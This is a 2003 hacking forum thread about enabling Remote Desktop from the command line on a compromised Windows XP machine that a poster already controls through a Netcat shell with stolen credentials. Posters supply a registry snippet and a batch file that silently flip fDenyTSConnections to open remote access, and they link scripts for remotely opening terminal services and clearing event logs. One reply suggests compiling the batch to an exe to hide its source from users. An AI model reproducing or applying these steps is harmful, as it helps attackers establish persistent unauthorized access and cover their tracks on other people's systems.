-=[MePhIsTo]=-
Oct 17 2003, 05:03 PM
How to open the Remote Desktop connection on Windows XP per command line ?
There was one Thread on the forum but this was only for Windows 2000.
I need it for WIndows XP
big thx
-=[MePhIsTo]=-
Oct 18 2003, 10:40 AM
Does really no one knows this
n4than_69
Oct 18 2003, 11:31 AM
hey is that even possible?
MxMx
Oct 18 2003, 12:29 PM
its not possible through command line .. although it is possible through another script .. but before you can do that .. U need the pass/username of your hacked thingie
MxMx
Oct 18 2003, 02:50 PM
A collection of remote scripts including ROTS v1.05 (Remote Open Terminal services Script), RCLS v1.05 (Remote Clear eventLogs Script), RRSS v1.04 (Remote Reboot and Shutdown Script) and RTCS v1.10 (Remote Telnet Configure Script), all by zzzEVAzzz
download here :
http://secureit.co.il/modules.php?name=Dow...p=getit&lid=182just download the file and follow the instructions .. btw U need ROTS 1.05 which is included in the file
-=[MePhIsTo]=-
Oct 18 2003, 02:12 PM
I have User/pass on a machine. It's a Windows XP Server and i want to know how to open the Remote Desktop. Ich ahve a shell open with Netcat.
aspfreakout
Oct 18 2003, 06:37 PM
mstsc
DarkRider
Oct 19 2003, 04:41 PM
on windows 2003 server you cant start! It should manually installed by the admin of the box ;)
on windows xp it is possible :P with a register setting and a reboot ;)
echo this to a *.reg file in a telnet session ;)
| CODE |
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] "fDenyTSConnections"=dword:00000000 "fAllowToGetHelp"=dword:00000001
|
then regedit /s *.reg
now reboot and its enabled! :)
ghost_c
Oct 22 2003, 05:57 AM
never tested it...

i'll try it thnks 4 the info guys
-=[MePhIsTo]=-
Oct 22 2003, 10:21 AM
Big thx DarkRider it works perfectly
here is the batch
| CODE |
echo Windows Registry Editor Version 5.00> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg echo "fDenyTSConnections"=dword:00000000>> c:\TS.reg echo "fAllowToGetHelp"=dword:00000000>> c:\TS.reg
regedit /s c:\TS.reg
del c:\TS.reg |
taimoor
Dec 29 2003, 01:00 PM
good
Progressor
Dec 30 2003, 11:02 AM
very usefull, I'll try it.
FakoLy
Dec 30 2003, 04:11 PM
i'll try it 2

thx
net_runner
Dec 30 2003, 04:39 PM
very interesting, thankz
FiNaLBeTa
Dec 30 2003, 05:14 PM
thnx for the code snippet darkryder.
i'm sure i'll use it someday
dfx
Dec 31 2003, 03:35 AM
yes, very good to know.
i have added it to my toolbox.
thanks darkrider
rush
Dec 31 2003, 01:11 PM
Very good yes,
this service is only on winxp? Or also win2kpro?
boshcash
Dec 31 2003, 01:15 PM
of course its possible u can do it with the built in reg command , to edit the registry ..
Neo2k
Dec 31 2003, 01:16 PM
Thx for the reg key

I will be so usefull
tomer_shim
Jan 2 2004, 11:39 AM
tnx very usfull!!!
Gargamel
Jan 2 2004, 02:22 PM
@MxMx:
"You are trying to access a restricted area."
when i register i didnt get a e-mail, so i cant see the forum and download the things
randalizm
Jan 7 2004, 03:56 AM
her is one for ya, i ve got a problem using telnet, i gain connection to the remote host as i know its password blah blah, i run edit.com but i cant seem to accessthe menus because it doesnt recognize alt+f i have been told to try changing the term type??? but that doesnt work making it hard to create a batch.
TedOb1
Jan 7 2004, 05:19 AM
try using edlin. its not as easy to use but itworks fine in shells.
randalizm
Jan 10 2004, 02:51 PM
hehe thats right thx for that!
stupid me forgot about dat
i guess i couldve just echoed the script to a batch file but EDlin would be better
LittleHacker
Jan 10 2004, 07:42 PM
Thanks for That Nice BatchFile
chris105
Jan 11 2004, 09:09 PM
cheers for code i can put it to an exe if you want ? (use bat2exe google it) then if u need it for other .. ahem .. purposes the user cant read the source
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.